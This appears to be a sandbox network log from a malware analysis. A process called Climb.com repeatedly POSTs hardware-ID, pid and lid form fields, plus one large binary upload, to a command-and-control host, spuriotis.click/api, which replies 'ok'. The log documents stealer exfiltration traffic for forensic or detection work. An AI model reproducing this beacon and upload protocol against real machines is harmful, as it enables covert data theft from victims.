2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 33 31 4c 56 67 6b 73 44 2f 2b 2f 51 54 50 4c 33 5a 49 68 64 67 47 4e 46 6b 51 6d 7a 77 30 4d 6b 51 55 57 57 4b 2f 46 30 70 79 48 63 55 35 42 52 67 4d 50 70 62 6f 50 63 38 76 4f 6e 47 42 32 46 73 64 65 47 6d 65 49 55 30 76 54 51 68 45 56 2f 64 6d 55 78 39 46 7a 41 32 39 31 49 52 72 75 72 41 49 2f 75 74 7a 57 62 79 4d 44 6c 77 46 33 46 2b 56 54 44 4a 73 42 46 43 66 35 79 4a 4c 4b 77 44 41 4b 45 56 4e 4d 55 4b 6d 52 45 33 71 62 30 70 49 33 64 67 7a 48 58 67 6b 6b 32 6b 59 62 69 45 35 52 44 4f 69 4c 6a 59 72 65 4d 46 49 52 45 31 39 47 71 61 35 42 4a 63 75 57 33 48 51 33 41 34 6b 46 57 7a 76 4f 51 68 32 49 52 57 67 6f 77 74 6d 56 31 4d 51 79 64 56 78 50 47 68 33 71 72 41 5a 44 74 66 7a 41 66 69 59 44 78 53 70 4f 4a 4d 52 2f 4e 62 77 54 55 51 61 74 37 5a 48 53 Data Ascii: 31LVgksD/+/QTPL3ZIhdgGNFkQmzw0MkQUWWK/F0pyHcU5BRgMPpboPc8vOnGB2FsdeGmeIU0vTQhEV/dmUx9FzA291IRrurAI/utzWbyMDlwF3F+VTDJsBFCf5yJLKwDAKEVNMUKmRE3qb0pI3dgzHXgkk2kYbiE5RDOiLjYreMFIRE19Gqa5BJcuW3HQ3A4kFWzvOQh2IRWgowtmV1MQydVxPGh3qrAZDtfzAfiYDxSpOJMR/NbwTUQat7ZHS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49722	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:04 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W4VT9U8C13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12787 Host: spuriotis.click
2024-12-28 08:57:04 UTC	12787	OUT	Data Raw: 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 57 34 56 54 39 55 38 43 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --W4VT9U8C13Content-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--W4VT9U8C13Content-Disposition: form-data; name="pid"2--W4VT9U8C13Content-Disposition: form-data; name="lid"5FwhVM--lll--W4VT9U8C13Content-Di
2024-12-28 08:57:04 UTC	1130	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=meb6hsho7fqsj4e4joefu09t4n; expires=Wed, 23 Apr 2025 02:43:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGZQmWDcYotFsTQu87hGi8RUN%2BTCYH72LtcpezUH1qMhDie%2B6IO%2Ff3O1g2VbdfwIS0dEMIva%2BvZUVhVqwbFVawJxJLJPJfaX0VjqkcSwQf9PeToSP29OMQMXXzYIORU%2Flho%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f905739afb24273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2184&min_rtt=2181&rtt_var=824&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13718&delivery_rate=1324263&cwnd=32&unsent_bytes=0&cid=27008dd1dfd14530&ts=901&x=0"
2024-12-28 08:57:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:57:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49723	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:06 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7H5VWCKKRPBASPSM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15058 Host: spuriotis.click
2024-12-28 08:57:06 UTC	15058	OUT	Data Raw: 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 37 48 35 56 Data Ascii: --7H5VWCKKRPBASPSMContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--7H5VWCKKRPBASPSMContent-Disposition: form-data; name="pid"2--7H5VWCKKRPBASPSMContent-Disposition: form-data; name="lid"5FwhVM--lll--7H5V
2024-12-28 08:57:07 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8bs01kvhv5q5dv2dvfk7lmv313; expires=Wed, 23 Apr 2025 02:43:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RMv3Q8SjjSv53hnhyRIBghrnmbOav2E1xVXEgFQzuLtpCy%2BOm3%2FWmMaVfDL7t3hr59Jcoau4a7akY2heOGJzEKeziblFdmilKI8egqbm7L2EFafVuW%2FD7uklVIbuCV%2Fn3o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f905747bab24406-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1664&rtt_var=655&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15995&delivery_rate=1631284&cwnd=186&unsent_bytes=0&cid=bbfda4c54f5e045a&ts=886&x=0"
2024-12-28 08:57:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:57:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49724	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:08 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C4T4PAUKBR25MP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20221 Host: spuriotis.click
2024-12-28 08:57:08 UTC	15331	OUT	Data Raw: 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52 Data Ascii: --C4T4PAUKBR25MPContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--C4T4PAUKBR25MPContent-Disposition: form-data; name="pid"3--C4T4PAUKBR25MPContent-Disposition: form-data; name="lid"5FwhVM--lll--C4T4PAUKBR
2024-12-28 08:57:08 UTC	4890	OUT	Data Raw: 00 00 00 00 00 00 d0 e7 46 a2 c3 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 30 1c 1d 16 fb 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Fb}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>\|0~
2024-12-28 08:57:09 UTC	1134	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7mccbkakfdtp4l8b7j0lf1n0gq; expires=Wed, 23 Apr 2025 02:43:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MoOnREj5AP3R9pt%2FVr2WRBazMyU5%2Fqq%2BM3PY7Re8sCy6SkEJLM4clDVJYcazUuYTsWxg8TBqLuJ3nH6g2bzdOntrv%2F2vLa5FJH8AJPjZ6lbSf9fbK%2FI4uxlF%2BMXTgKsZnLg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9057569fcc7cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1937&rtt_var=730&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21178&delivery_rate=1507485&cwnd=216&unsent_bytes=0&cid=e8991803cb69b078&ts=1008&x=0"
2024-12-28 08:57:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:57:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49725	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:11 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FIHNBRZDAAYIUN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1205 Host: spuriotis.click
2024-12-28 08:57:11 UTC	1205	OUT	Data Raw: 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41 Data Ascii: --FIHNBRZDAAYIUNContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--FIHNBRZDAAYIUNContent-Disposition: form-data; name="pid"1--FIHNBRZDAAYIUNContent-Disposition: form-data; name="lid"5FwhVM--lll--FIHNBRZDAA
2024-12-28 08:57:12 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rsh0rt9jr4g04ucdltkg1cjnkk; expires=Wed, 23 Apr 2025 02:43:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJxpStfSe%2B%2FV0f9n3mRB21ZDtCsUu3oN%2FXMbQpTaDqIW37vjPzFT8tX3fUqPmQ5ic%2FIQFPAaYp9%2BoibHbRwFLlpZx%2BAMlQOovOiHCdFhoX%2BIkWvsqJIyaST64RBTg4v7mPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9057660acac443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1649&rtt_var=629&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2117&delivery_rate=1725768&cwnd=244&unsent_bytes=0&cid=071967ffe44a4fdb&ts=850&x=0"
2024-12-28 08:57:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:57:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49726	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:13 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=10Z7J3JV28FW6XX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 571886 Host: spuriotis.click
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 31 30 5a 37 4a 33 4a Data Ascii: --10Z7J3JV28FW6XXContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--10Z7J3JV28FW6XXContent-Disposition: form-data; name="pid"1--10Z7J3JV28FW6XXContent-Disposition: form-data; name="lid"5FwhVM--lll--10Z7J3J
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 94 9a a2 27 75 25 b1 7c 32 ae 2e b9 98 51 f9 59 ba 68 84 cf e8 61 f8 a1 5e 6c ac f8 83 22 6e 31 1e 8c a3 da a7 78 bf 0c 55 e9 06 09 9c 3b 52 c4 ab 10 91 15 af 7f c3 84 d0 bf 3f 1a f6 93 98 15 a2 33 50 ed 93 eb 62 7d 45 c3 91 0c 11 a2 9a ee 94 01 c0 d8 9e a8 c0 9d 26 51 32 e6 8d 0c 63 22 ec 09 cf 93 ad 55 e9 7d 4b e6 70 cc 20 cc 16 12 dc 92 c0 f4 a1 e1 78 ee ad 48 8d 8f d7 c7 6d e3 d4 c7 95 5e 7e 71 60 3e 73 b0 66 d9 d3 a5 e3 b6 6f f9 3d 9e 83 83 d2 4e dc 78 51 eb 07 be 6b 15 9a 1b 4b 7f dc e5 76 24 40 99 a8 48 56 18 09 16 98 a6 e4 6b ba 36 90 3a b0 17 19 d9 fd 7e 92 3b 8d d2 e6 37 2c b8 87 c6 a2 b7 eb c3 f6 59 1a 62 e1 59 7c 09 25 79 85 7d a5 18 92 54 fa fa aa e5 45 33 b5 82 2f d6 3d fd 9e dc 1f 93 f3 75 bf d6 9f 4a 0f 47 84 26 62 77 95 96 44 92 44 bf 22 Data Ascii: 'u%\|2.QYha^l"n1xU;R?3Pb}E&Q2c"U}Kp xHm^~q`>sfo=NxQkKv$@HVk6:~;7,YbY\|%y}TE3/=uJG&bwDD"
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 7c a0 25 a5 a0 92 dd 3c d1 f9 e8 63 78 85 e8 6d fa 0f 5f d1 a8 17 a5 bc f7 3f 22 09 5d 1d ec 17 0e 04 8f de 4e c3 f9 03 99 6b 0b 6f 86 ab 7b 3f a8 92 1a 8e ec be c3 ee 2c ab 1d 4f ac f6 2a aa 9a 5f 0f 19 f6 2a 1b 99 0c e7 ae 64 56 55 2d 6c 7e 08 f1 9b 3d 5a 46 fe f2 f7 6b 88 f1 2e 80 fb c9 49 eb a7 59 c0 7f 3f 32 cb 57 3a f4 d5 e1 ba 02 ee e2 79 d6 60 66 e0 ce d0 17 31 e7 8d 43 0a 72 52 4b 9b 3f 6e af d1 47 ff 55 13 36 71 fe fa 7a 23 43 74 6c f9 be 43 f5 fc b7 70 d6 d8 53 c1 9a 8e df 6b 26 7f 52 f8 56 c3 e9 a8 62 16 69 cf 8d a4 3d f4 2e 7f 95 db d7 87 85 ad 8c 39 25 0e 55 77 df 0d 95 dc fc 67 88 bd 5e 55 cf 9f c3 52 0e 1b 8d fc ea 61 60 51 de 11 f9 60 bf 77 50 10 ec d7 38 f9 6c 87 91 f7 a7 7d 18 98 5b b5 8f 71 26 3f ce 63 1f 83 7c e6 38 08 f5 fa 55 58 5f Data Ascii: \|%<cxm_?"]Nko{?,O_dVU-l~=ZFk.IY?2W:y`f1CrRK?nGU6qz#CtlCpSk&RVbi=.9%Uwg^URa`Q`wP8l}[q&?c\|8UX_
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 5c a8 d4 77 85 34 a9 1d fa 13 8b dd 0e f0 e1 bf b4 f9 27 7d d5 eb 1b 5f 72 e3 98 02 d6 85 48 56 c5 dc 2b c7 64 31 f1 be 88 4d 92 6e 5a 4a 75 a5 8c 67 43 6f 40 51 33 f4 2f 73 e2 cf 16 58 ea b3 7c 0a a3 cd f8 d9 84 c3 00 b3 ee cf 68 ba e7 d6 e9 c3 8d bc f3 5f 51 91 d6 cf 77 48 be 98 01 c0 b3 53 71 06 f3 95 93 75 cf 7f 73 59 ff 4d e4 f4 69 df 52 4a d6 46 37 ed b2 de 78 4f cb e8 0b 49 df 73 61 f0 e7 d5 78 36 0c 71 4b 46 71 1e ab 6e c7 74 e0 5d 5c f0 e4 ab 0b 66 06 2b b2 b6 a3 76 54 07 47 4b 9c 8d 0a 48 e6 2e 7b 9a ae dd fb 42 fd c9 1a c8 33 a5 cf 3d 2a de b9 bb ff eb 90 fd 76 80 fe 4e 61 09 18 4e fc 8c 24 d1 14 68 46 fc 40 97 1f 8a e6 05 13 e5 d9 1a e8 6e 1e e6 2c 02 28 21 29 f8 6b 52 c7 93 f9 ab 32 25 80 26 1c 01 81 1e a1 73 c5 3c 50 0e 7f 3b 1a 21 04 04 84 Data Ascii: \w4'}_rHV+d1MnZJugCo@Q3/sX\|h_QwHSqusYMiRJF7xOIsax6qKFqnt]\f+vTGKH.{B3=*vNaN$hF@n,(!)kR2%&s<P;!
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 6c 70 88 c9 59 3c ae 09 d1 ce f0 da 4d b3 dd 12 c3 bf 2e 25 a9 63 fa 34 c4 81 cb 53 a9 d3 57 c1 14 6b 87 a7 fe 81 b6 6e 62 8b f9 15 aa fa 85 1a 83 6a a3 56 c6 4a 44 eb ff b6 ae 23 b8 ee 5a 66 9c 0a 8f 50 a9 3a 9d 89 01 59 e5 88 37 ff 4f a8 fe 3f 39 db 00 4e 33 b3 a5 88 80 39 0c b8 86 9e 1a b1 97 84 9a 5e 6e 77 fd e2 04 2c e0 80 1c 43 42 76 c3 8e 25 02 84 6e e7 ab 42 41 4a 70 ba f0 8a 01 20 23 c2 44 c1 81 ae 3b c0 b4 bb 3e 18 c3 56 43 b5 9c f2 37 2a 1c 6a 99 c3 ff 33 89 ea 45 1f 1d 6a 15 2f 40 c6 bc 92 20 7f 30 83 70 f2 19 75 21 46 df e5 82 5e cf e6 bb 8b e2 88 32 e4 34 2d b6 15 d7 eb 28 9c 3c 68 98 52 1d ab 74 43 74 0a 25 60 41 a4 22 36 0f 2f b5 d3 11 44 f6 45 1f eb cd d9 8f 9b e1 ba dc 9d b5 0a 2a 6c 0a 88 95 9c c4 cd bd 7e c8 66 6b c4 d1 e1 5b fc 45 41 Data Ascii: lpY<M.%c4SWknbjVJD#ZfP:Y7O?9N39^nw,CBv%nBAJp #D;>VC7j3Ej/@ 0pu!F^24-(<hRtCt%`A"6/DEl~fk[EA
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 8d 2c f8 4d ab 26 a0 ae 68 36 52 21 06 9b bb cc 5d 83 83 4f 68 59 42 9a 96 24 08 ca 9f cb fd 6f 9d 5d bf 5d 33 af 70 19 dc f1 7b c6 e7 3b 32 0e f3 47 fa df 99 89 02 00 70 84 81 46 22 14 0a 98 eb 53 53 0f 46 d2 ce c3 f9 e1 75 d8 13 ca 8d ce db 3d 10 57 bd ff b0 01 58 c3 e6 29 f0 ea 8f 91 9b 43 14 01 f0 6a a9 0d 49 57 60 d1 53 42 7f 95 1e 30 c0 4e 05 68 20 21 5e c4 21 84 09 95 7e 8f c9 3d 4d 88 89 ac f6 fd d2 2a f0 42 df 5b f2 66 cb c8 df 37 ec 58 55 1d 87 1c 85 85 eb 9f eb dd 2a bd fe 06 22 8f 6f 5c de 23 03 b4 6f 0e 4d fc 83 d9 f8 0a 31 ca aa 8f e1 18 82 63 3a 18 21 68 a1 51 a8 57 f2 a7 2c bd 71 cf a5 33 b9 58 df c2 82 1a 02 ff 1c 1c 9f 58 a6 23 1a 5e df 06 db 65 a3 f2 10 59 7d f1 20 b6 f3 af e4 e4 af 20 3b 10 bc 31 25 15 0d bc 62 9c 05 e4 3c fc 95 54 01 Data Ascii: ,M&h6R!]OhYB$o]]3p{;2GpF"SSFu=WX)CjIW`SB0Nh !^!~=MB[f7XU"o\#oM1c:!hQW,q3XX#^eY} ;1%b<T
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 5c fb 81 39 65 46 a8 3b 51 60 10 9f 5a 77 dc 67 6d 5f 8b 99 8a e4 26 a0 56 e4 be 94 ed 66 c3 41 50 a7 16 53 aa 5f c0 7b 92 eb b7 a7 18 1b d2 3a ff 85 2e c8 48 2a e6 62 51 8a 76 3c 88 83 92 f5 b5 0f 21 32 bb 80 ed 92 ba e5 01 31 0c 8c 3f 1b 6e 6f 4a a8 b4 7a 2e 0e 7f 16 48 63 fd 76 65 fd fe a7 ae e6 59 04 77 33 67 7b 92 a3 f4 c6 b5 46 91 63 16 cc 52 58 38 b2 b1 c7 9a 6d 1e bf 18 ce 6a 4b dc 51 8f a1 a8 0f 31 a8 0c c2 78 e3 df 6f 5f fc 7a 61 43 b7 7b 05 eb 3e f3 1a 77 19 d9 7f 4a dd 68 75 86 be cc fa 67 b7 d4 00 55 95 a1 83 9d ea e1 01 35 cb df 7f 7a de bc 14 62 69 45 28 8a db ac c0 44 cd bf 51 3d 7d ff c4 9d 79 a7 3e 4f bf dc 9e a7 2d 02 01 74 df 9b 4a 81 78 6d 71 d9 35 a5 bd 28 7c f4 6a e1 a3 0a 54 f6 95 20 c6 e8 31 b5 b0 de ef 82 de 6a 7f 4c f2 a8 9d 76 Data Ascii: \9eF;Q`Zwgm_&VfAPS_{:.H*bQv<!21?noJz.HcveYw3g{FcRX8mjKQ1xo_zaC{>wJhugU5zbiE(DQ=}y>O-tJxmq5(\|jT 1jLv
